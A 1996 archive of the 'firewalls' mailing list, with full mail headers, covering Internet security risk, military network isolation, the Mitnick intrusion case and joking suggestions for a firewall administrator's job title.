Precedence: bulk > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > years, and I've never heard of a "Q" clearance. Ten years ago is too recent. Back in the days of free trips to SouthEastAsia there were several compartmented levels above Top Secret such as "R" and "Crypto" that usually required EBIs. "Q" referred to certain "special weapons" that I will not go into further. Does Brain21's father glow in the dark ? Warmly, Padgett From firewalls-owner Fri Jan 12 11:06:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA22931 for firewalls-outgoing; Fri, 12 Jan 1996 09:02:47 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA22922 for ; Fri, 12 Jan 1996 09:02:38 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id MAA29954; Fri, 12 Jan 1996 12:01:41 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id MAA27461; Fri, 12 Jan 1996 12:01:31 -0500 (EST) Date: Fri, 12 Jan 1996 12:01:26 -0500 (EST) From: "Paul D. Robertson" To: Danny Cox cc: firewalls@GreatCircle.COM Subject: Re: Insecurity of Internet connections In-Reply-To: <9256.9601121010@gmap.leeds.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Danny Cox wrote: > And thus spake Benjamin Allan Smith : > > This left me musing. The overall purpose of building firewalls between our > internal networks and the Internet (or any other network) is to secure ourselves > from compromise as best we can. There is a lot of twitchiness around about > allowing Internet connections and I suspect that's in part simply driven by the > media, who pick up cheerfully on stories of succesfully compromised systems > whether due to poor administration or bad initial configuration or weak security > software or whatever. > > What I'm trying to get a feel for, and I'm struggling a little, is to what > extent we can secure ourselves in the ideal world. When I hear people say that > the Internet is insecure, and connecting to the Internet is an enormous > security risk, I squirm. If, as an absolute statement, those are true, then > maybe we're wasting time here anyway. Assuming it's not, then what level of > assurance can we offer to a non-techie sort of person. Does anyone have numbers > to indicate what attacks are successful - a sort of top ten if you would? > The Internet is insecure in many ways. I'd venture to guess that each of us has a little different view of security, and risk. The risks are many, and varied. The risks are in many cases similar to allowing other things: Desktop modems Diskettes from unknown sources People to enter the building unathenticated Complete trust of vendors and/or contractors (Security trust, not social trust) If you let things go into, and come out of your network, then you're vulerable, at some level or other. It may take compromise of an internal machine, or a trojaned binary tht does encapsulation, but that's why you have multiple layers of security, and why network security doesn't preclude host security. 'Enormous' really depends on what's on your network, and what inherent protections that 'what' has on it. If your company financials are sitting on a Solaris box, a release back, with no patches, and you've got enemies, then it's a little different than if they're on an AS/400 with only SNA access, and session level encryption with say MAC authentication over a switched network. IMO Security is never a waste of time, even if it isn't absolute. However the ammount of time you've put into your risk analysis, and keeping it up to date are a good indication of what that time is worth. Threat analysis is a different animal than risk analysis. With the possibility of being outspoken, and probably flamed, I'd say that until you've done a thorough and professional risk analysis, doing threat analysis is premature. It also doesn't work in a general sense. Looking at numbers successful attacks is a crapshoot, beyond ensuring that you're not vulnerable to the well-known attacks. If you're in a business like my company's, where you can piss off several hundred thousand people a day, the number of successful attacks by unmotivated kids experimenting doesn't have the same weight as number and type of successful attacks by pissed off people. Though I'm sure type of attack is significant, numbers just don't mean much, as all you need is one. > When the military refuse connections to the Internet - are they absolutely right > because the Internet is insecure, or simply covering their backs (understandably) > in case of something going amiss, which isn't known about currently ? They > must achieve some sort of risk analysis in order to decide what's underlying > network topology is okay and what isn't, I assume. Anyone give some insight > as to how this is done ? > Sure, it's deny everything, and allow only what you absolutely *have* to, after verifying that it looks safe. I find it to be a good philosophy in general. The proof, of course is in how you verify that something looks safe. In the case of governments, you spend quite a large sum of money with experts in many fields, from partical physists up the tree. In a commercial environment, you tend to do what you can with what you know, or have connections or a budget for, put more faith in vendors, test their assertions anyhow, and disallow anything you can't or don't understand. The military's distrust of public networks, such as phone systems, the Internet, etc., comes from the fact that if certain information is compromised lots of people potentially die. Given the risk, their posture is quite correct. > I don't feel that my words ask my question very precisely, but hopefully they > might allow a bit of reading between lines to show what I'm getting at! Assurance is not easy to quantify. Especially given the level of trust which non-technical people place in information and programs from anonymous sources (let alone vendors). The Good Times virus being an excellent case in point. But then, we're *supposed* to be paranoid, and our model of an ideal world is so far out from reality that it's not approachable. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jan 12 11:15:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26379 for firewalls-outgoing; Fri, 12 Jan 1996 11:06:25 -0800 (PST) Received: from melita.melita.com ([192.68.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26368 for ; Fri, 12 Jan 1996 11:06:13 -0800 (PST) Received: from melupl.melita.com ([10.168.27.12]) by melita.melita.com (8.6.12/8.6.9) with SMTP id OAA02683; Fri, 12 Jan 1996 14:05:59 -0500 Received: by melupl.melita.com (AIX 3.2/UCB 5.64/4.03) id AA43800; Fri, 12 Jan 1996 14:05:12 -0500 From: davek@melupl.melita.com (Dave Kennedy) Message-Id: <9601121905.AA43800@melupl.melita.com> Subject: Re: "Title for Firewall Admin? To: shawn@aob.org (Shawn Steele) Date: Fri, 12 Jan 1996 14:05:12 -0500 (EST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9601121030.ZM24307@aob.org> from "Shawn Steele" at Jan 12, 96 10:30:29 am Reply-To: davek@melita.com (Dave Kennedy) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? keymaster Remember "Ghostbusters?" There was the gatekeeper and the keymaster. -- | Dave Kennedy (davek@melita.com) Voice: 770-409-4575 | From firewalls-owner Fri Jan 12 11:44:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26334 for firewalls-outgoing; Fri, 12 Jan 1996 11:05:32 -0800 (PST) Received: from homer.gmcc.ab.ca (homer.gmcc.ab.ca [198.161.32.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26284 for ; Fri, 12 Jan 1996 11:04:27 -0800 (PST) Received: by homer.gmcc.ab.ca (AIX 3.2/UCB 5.64/4.03) id AA17433; Fri, 12 Jan 1996 11:45:54 -0700 Received: from admin.gmcc.ab.ca(198.161.32.16) by homer via smap (V1.3) id sma007189; Fri Jan 12 11:45:52 1996 Received: from STIMPY/SpoolDir by admin.gmcc.ab.ca (Mercury 1.21); 12 Jan 96 12:18:51 MST Received: from SpoolDir by STIMPY (Mercury 1.21); 12 Jan 96 12:18:35 MST From: "Tim Crisall" Organization: Grant MacEwan Community College To: firewalls@GreatCircle.COM Date: Fri, 12 Jan 1996 12:18:32 MST Subject: Re: "Title for Firewall Admin? X-Mailer: Pegasus Mail v3.22 Message-Id: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? Guardian Of Data _ _ _ Tim Crisall Grant MacEwan Community College From firewalls-owner Fri Jan 12 11:50:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25680 for firewalls-outgoing; Fri, 12 Jan 1996 10:48:25 -0800 (PST) Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25673 for ; Fri, 12 Jan 1996 10:48:15 -0800 (PST) Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0taoVL-00029yC; Fri, 12 Jan 96 10:47 PST Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0taoTk-0003oQC; Fri, 12 Jan 96 10:45 PST Message-Id: From: jgt10@amdahl.com (John G. Thompson) Subject: Re: "Title for Firewall Admin? To: avolio@trusted.com (Frederick M Avolio) Date: Fri, 12 Jan 1996 10:45:31 -0800 (PST) Cc: billcurr@cyberspace.com, firewalls@GreatCircle.COM In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> from "Frederick M Avolio" at Jan 12, 96 09:31:21 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > But I can see, eventually, a need for a well known different term. > > Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > > "gatekeeper" is a fun possibility. "doorman" is too plain. Well, the obvious follow on (particularly with the RealAudio reference) is... "Doormat". JGT -- John G. Thompson jgt10@amdahl.com 1-408-992-2088 Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470 [The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opionions of the Amdahl Corporation.] From firewalls-owner Fri Jan 12 11:59:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28561 for firewalls-outgoing; Fri, 12 Jan 1996 11:53:03 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28528 for ; Fri, 12 Jan 1996 11:52:44 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id NAA25509; Fri, 12 Jan 1996 13:51:38 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id NAA00777; Fri, 12 Jan 1996 13:51:38 -0600 Posted-Date: Fri, 12 Jan 1996 13:51:38 -0600 Date: Fri, 12 Jan 1996 13:51:37 -0600 (CST) From: Ron DuFresne To: Bob Resino cc: firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura ( In-Reply-To: <199601121628.KAA23450@icicle> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Bob Resino wrote: > > Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST) > > From: Ron DuFresne > > To: Brain21 > > Cc: Doug Hughes , firewalls@GreatCircle.COM > > Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) > > SNIP > > > > Agreed, either we have here an exterme case of over-confidence, > > misconfiguring by others really doing the security, or good old Mitnick > > was 'invited' in a case bordering on entrapment. Seems very strange in > > either way, seems strange if not an outright blunder. > > > > Later, > > > > > > Ron Dufresne > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > "Cutting the space budget really restores my faith in humanity. It > > eliminates dreams, goals, and ideals and lets us get straight to the > > business of hate, debauchery, and self-annihilation." -- Johnny Hart > > ***testing, only testing, and damn good at it too!*** > > > > OK, so you're a Ph.D. Just don't touch anything. > > > > > Ron, > In some states, there is no such thing as "Entrapment". Such is the > case in the Commonwealth of Virginia. One simple warning screen like > the CERT P.L. 98-473 warning would preclude any claim of entrapment. > Bob, I can understand this in a purely legal sense, yet, the fact that T. S. had tools on a home system connected to his place of employ, with the BSD 'r' utils enabled would lead one to think of this , in less than legal terms as an *invite*. And if there was some 'reason' for leaving this system open, such as to 'discover' who might be 'doorknob twisting' or entering, in a sense, this was a setup, and thus, entrapment. Course, legally, are you implying that an officer of the law can go about in Virginia and solicit illegal activities of felons at will? Sounds like a whole new, or would it be old archaic? legal system you folks have there if this is so... Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Fri Jan 12 12:06:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25035 for firewalls-outgoing; Fri, 12 Jan 1996 10:16:56 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25030 for ; Fri, 12 Jan 1996 10:16:52 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id NAA19451; Fri, 12 Jan 1996 13:15:53 -0500 Date: Fri, 12 Jan 1996 13:15:53 -0500 From: Chris Eastman Subject: tracking mitnick To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tracing Mitnick back to his original destination would be rather trivial regardless of the hosts he bounced through. Wonder what those unknown connections to MAE-east are... :) --chris %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Fri Jan 12 12:15:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24932 for firewalls-outgoing; Fri, 12 Jan 1996 10:12:48 -0800 (PST) Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24927 for ; Fri, 12 Jan 1996 10:12:44 -0800 (PST) Received: from sousa.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0tanwx-00020eC; Fri, 12 Jan 96 10:11 PST Received: by sousa.amdahl.com (Smail3.1.28.1 #4) id m0tanvM-0003oQC; Fri, 12 Jan 96 10:10 PST Message-Id: From: jgt10@amdahl.com (John G. Thompson) Subject: Re: "Title for Firewall Admin? To: billcurr@cyberspace.com (Bill Curr) Date: Fri, 12 Jan 1996 10:09:58 -0800 (PST) Cc: firewalls@greatcircle.com In-Reply-To: from "Bill Curr" at Jan 11, 96 04:04:55 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? Not that I know of, but I'm aggitating for... 'Internet Access Engineer' Which sounds alot better than what I really am... JOAT(MON) Jack Of All Trades (Master Of None). JGT -- John G. Thompson jgt10@amdahl.com 1-408-992-2088 Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470 [The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opionions of the Amdahl Corporation.] From firewalls-owner Fri Jan 12 12:28:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26106 for firewalls-outgoing; Fri, 12 Jan 1996 11:01:27 -0800 (PST) Received: from novell.com (nj-ums.fpk.novell.com [147.2.128.54]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26089 for ; Fri, 12 Jan 1996 11:01:08 -0800 (PST) From: cjc@novell.com (Chris Calabrese) To: firewalls@GreatCircle.COM Date: Fri, 12 Jan 1996 13:13 EST Received: from summit by UMS-hub.novell.com; Fri, 12 Jan 96 13:42 EST Subject: Re: Insecurity of Internet connections Content-Type: text/plain Message-ID: <30f6ab820.278b@chimaera.summit.novell.com> Original-Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: dannyc@gmap.leeds.ac.uk (Danny Cox) > Date: Fri, 12 Jan 1996 10:10:16 GMT > Message-ID: <9256.9601121010@gmap.leeds.ac.uk> > > [...] > The overall purpose of building firewalls between our > internal networks and the Internet (or any other network) > is to secure ourselves from compromise as best we can. > There is a lot of twitchiness around about allowing Internet > connections and I suspect that's in part simply driven by the > media [...] > > When I hear people say that the Internet is insecure, > and connecting to the Internet is an enormous security risk, > I squirm. To say that "the Internet is insecure" is meaningless since "the Internet" is merely a connection of routers and wires. A more reasonable statement is "I don't trust the security of the software on my computers enough to allow anyone in the known universe to send them data accross the Internet." For the military, the statement is "I don't trust the security of the software on my firewall enough to allow anyone in the known universe to send data to my computer with top-secret data that could alter the course of the world." Given that very few items of software/hardware in the world have been proven correct (yes, there are some), this seems a reasonable statement. In fact, it's not just the Internet they don't trust. The really really really top secret computers are in bunker-like rooms with guards with big guns at the doors and no wires going outside the rooms other than power lines (which are heavily filtered to make sure it's only power that's going across). In turn, the rooms are in bunkder-like buildings with guards at the doors, and they're on military campues (campi, actually) with fences and guards at the gates. For practical reasons, some of these computers may be networked (like if they control missle launches at bases 1,000 miles away), but then the wires are run through physically secure routes (except for the links to ships, obviously), heavy encryption is used (with key-echange done by pieces of paper in a briefcase), etc, etc. For computers that whose loss of data or leakage of data can't alter the fate of the world (and certain computers at certain financial institutions may not fall into this category), an Internet connection (and the equipment that goes along with it) installed and administered by skilled professionals lowers the risks substantially. The question is whether the the users of the computers get enough benefits to justify the remaining risks and the cost. For most educational institutions and businesses, especially those in the computer industry where customers expext to be able to download patches from the net, get support via e-mail, etc, etc, the answer is clearly yes. As costs come down, firewall become more secure, and there are more and more benefits to being on the net, the answer is becoming yes in more and more cases. -- Christopher J. Calabrese Network Security Architect Novell IS&T Security Services Group, Florham Park, NJ cjc@novell.com From firewalls-owner Fri Jan 12 12:29:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27351 for firewalls-outgoing; Fri, 12 Jan 1996 11:31:51 -0800 (PST) Received: from iag.net (seminole.iag.net [204.27.210.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA27345 for ; Fri, 12 Jan 1996 11:31:47 -0800 (PST) Received: by iag.net (Smail3.1.29.1 #9) id m0tapBZ-0000IMC; Fri, 12 Jan 96 14:30 EST Message-Id: From: syadasti@iag.net (Mike Gogulski) Subject: Re: "Title for Firewall Admin? To: firewalls@greatcircle.com Date: Fri, 12 Jan 1996 14:30:48 -0500 (EST) X-Kibo-Spews: Harry's destiny is like a dry, dead cactus. X-Day: Sun Jul 5 07:00:00 EST 1998 X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frederick M Avolio wrote: > > "gatekeeper" is a fun possibility. "doorman" is too plain. > Ah, then we'll have to call hacker's "keymasters" in keeping with the Ghostbusters theme... Peace, Mike -- Mike Gogulski syadasti@iag.net Network Administrator syadasti@cat.net, syadasti@pobox.com Internet Access Group Altamonte Springs, Florida, USA +1-407-786-1145 Work +1-407-672-2340 Other From firewalls-owner Fri Jan 12 12:44:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29631 for firewalls-outgoing; Fri, 12 Jan 1996 12:12:17 -0800 (PST) Received: from ns1.sterling.com (ns1.sterling.com [198.4.58.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29625 for ; Fri, 12 Jan 1996 12:12:11 -0800 (PST) Received: by ns1.sterling.com id AA21580; Fri, 12 Jan 1996 14:07:46 -0600 From: Kent Landfield Message-Id: <199601122007.AA21580@ns1.sterling.com> Subject: Re: "Title for Firewall Admin? To: CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall) Date: Fri, 12 Jan 96 14:07:46 CST Cc: firewalls@GreatCircle.COM In-Reply-To: ; from "Tim Crisall" at Jan 12, 96 12:18 pm X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > And is there a list of these colorful "nom de nets" anywhere? > > Guardian Of Data Doormat seems more appropriate. ;-) -- Kent Landfield INTERNET: kent_landfield@sterling.com Director, Internet Services UUCP: uunet!kent || sparky!kent Sterling Software FAX: 1-214-891-8655 Phone: 1-214-891-8693 Pager: 1-800-386-0277 Please send comp.sources.misc-related mail to kent@uunet.uu.net. From firewalls-owner Fri Jan 12 12:59:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA02329 for firewalls-outgoing; Fri, 12 Jan 1996 12:57:15 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA02309; Fri, 12 Jan 1996 12:57:02 -0800 (PST) Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id PAA23968; Fri, 12 Jan 1996 15:56:02 -0500 (EST) From: "Marcus J. Ranum" Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id PAA05123; Fri, 12 Jan 1996 15:55:58 -0500 (EST) Message-Id: <199601122055.PAA05123@clark.net> Subject: Re: Firewalls-Digest V5 #23 To: Firewalls@GreatCircle.COM Date: Fri, 12 Jan 1996 15:55:57 -0500 (EST) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199601121809.KAA24839@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 10:09:53 am Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brian Boyle writes one of the great profound rules of system design: >If you don't know what the objective is, it is pretty hard to design a system >to help you get there. If you don't know what the objective is, then you'll never know if you've accomplished it. If you follow the 2 rules of system design, you are able to derive tests to determine if the thing works the way it's supposed to. These concepts are the central idea behind the orange book. In practice, though, the implementation details drowned out the intent. mjr. From firewalls-owner Fri Jan 12 12:59:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28753 for firewalls-outgoing; Fri, 12 Jan 1996 11:56:42 -0800 (PST) Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28723 for ; Fri, 12 Jan 1996 11:56:31 -0800 (PST) Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma007581; Fri Jan 12 14:54:46 1996 Posted-Date: Fri, 12 Jan 1996 14:54:45 -0500 Date: Fri, 12 Jan 1996 14:54:44 -0500 (EST) From: "Bryan D. Boyle" Subject: Re: "Title for Firewall Admin? To: Shawn Steele Cc: Firewalls@greatcircle.com In-Reply-To: <9601121030.ZM24307@aob.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk having been a 'wall admin since early '92, 'Hal' is my choice. Hal? Yeah. Remember that Far Side cartoon with the two deer standing in the forest, one of them has a bull's eye on his chest, and the other one says to him "Bummer of a birthmark, Hal". ;) Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "It is only the ignorant who suppose themselves omniscient." --General Robert Edward Lee-- On Fri, 12 Jan 1996, Shawn Steele wrote: > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > Firemaster? > > From firewalls-owner Fri Jan 12 13:14:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA03054 for firewalls-outgoing; Fri, 12 Jan 1996 13:09:19 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA03037 for ; Fri, 12 Jan 1996 13:09:12 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id NAA09235; Fri, 12 Jan 1996 13:06:16 -0800 Received: from icicle.winternet.com(198.174.169.5) by mycroft via smap (V1.3mjr) id sma009232; Fri Jan 12 13:05:13 1996 Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id PAA06742; Fri, 12 Jan 1996 15:05:50 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id PAA02869; Fri, 12 Jan 1996 15:05:50 -0600 Posted-Date: Fri, 12 Jan 1996 15:05:50 -0600 Date: Fri, 12 Jan 1996 15:05:49 -0600 (CST) From: Ron DuFresne To: Chris Eastman cc: firewalls@GreatCircle.COM Subject: Re: tracking mitnick In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Chris Eastman wrote: > Tracing Mitnick back to his original destination would be rather trivial > regardless of the hosts he bounced through. > > Wonder what those unknown connections to MAE-east are... :) > Actually, if you're at all familiar with the story, such ease proved not to be the case... Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Fri Jan 12 13:21:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27462 for firewalls-outgoing; Fri, 12 Jan 1996 11:35:05 -0800 (PST) Received: from mailer.scri.fsu.edu (mailer.scri.fsu.edu [144.174.128.110]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27457 for ; Fri, 12 Jan 1996 11:35:01 -0800 (PST) Received: from margit (margit.scri.fsu.edu [144.174.128.45]) by mailer.scri.fsu.edu (8.6.12/8.6.12) with SMTP id OAA07028; Fri, 12 Jan 1996 14:34:51 -0500 From: Ken Hays Received: by margit (AIX 3.2/UCB 5.64) id AA26551; Fri, 12 Jan 1996 14:33:44 -0500 Date: Fri, 12 Jan 1996 14:33:44 -0500 Message-Id: <9601121933.AA26551@margit> To: davek@melita.melita.com (Dave Kennedy) Cc: shawn@aob.org (Shawn Steele), Firewalls@GreatCircle.COM In-Reply-To: <9601121905.AA43800@melupl.melita.com> Subject: Re: "Title for Firewall Admin? Reply-To: Ken Hays Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dave Kennedy wrote on 12-Jan-96 at 14:05:12 -0500, in part: >> The mail administrator is "postmaster" >> The web server admin is "webmaster" >> Is there such a title for a firewall administrator? > >keymaster > >Remember "Ghostbusters?" There was the gatekeeper and the keymaster. I would suggest that keymaster be reserved for the Kerberos administrator. Later, Ken --------------------------------------------------------------------------- Kenneth M. Hays, Assistant Director hays@scri.fsu.edu Supercomputer Computations Research Institute aka kmh8 at the NIC Florida State University voice=904-644-7053 400 Dirac Science Center Library fax=904-644-0098 Tallahassee, Florida 32306-4052 ---------------------------------------------------------------------------- From firewalls-owner Fri Jan 12 13:29:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA03245 for firewalls-outgoing; Fri, 12 Jan 1996 13:12:32 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA03216 for ; Fri, 12 Jan 1996 13:12:16 -0800 (PST) Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id QAA26943 for ; Fri, 12 Jan 1996 16:11:15 -0500 (EST) From: "Marcus J. Ranum" Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id QAA08619 for Firewalls@GreatCircle.COM; Fri, 12 Jan 1996 16:10:49 -0500 (EST) Message-Id: <199601122110.QAA08619@clark.net> Subject: Re: "Title for Firewall Admin? To: Firewalls@GreatCircle.COM Date: Fri, 12 Jan 1996 16:10:37 -0500 (EST) In-Reply-To: <199601121809.KAA24839@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 10:09:53 am Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think most firewall admins are known by the title: "Is the Web down?" But that's probably a bit too long for a business card. [I'm "Chief Scientist" but that's only because "Vice President of RTFM" was too long and too informal. :) ] mjr. From firewalls-owner Fri Jan 12 13:44:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04347 for firewalls-outgoing; Fri, 12 Jan 1996 13:31:52 -0800 (PST) Received: from ns.ncsa.com (ns.ncsa.com [205.160.199.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04335 for ; Fri, 12 Jan 1996 13:31:44 -0800 (PST) Received: (from topher@localhost) by ns.ncsa.com (8.6.12/8.6.9) id QAA00696 for firewalls@greatcircle.com; Fri, 12 Jan 1996 16:38:49 -0500 From: topher Message-Id: <199601122138.QAA00696@ns.ncsa.com> Subject: Re: "Title for Firewall Admin? To: firewalls@greatcircle.com Date: Fri, 12 Jan 1996 16:38:48 -0500 (EST) 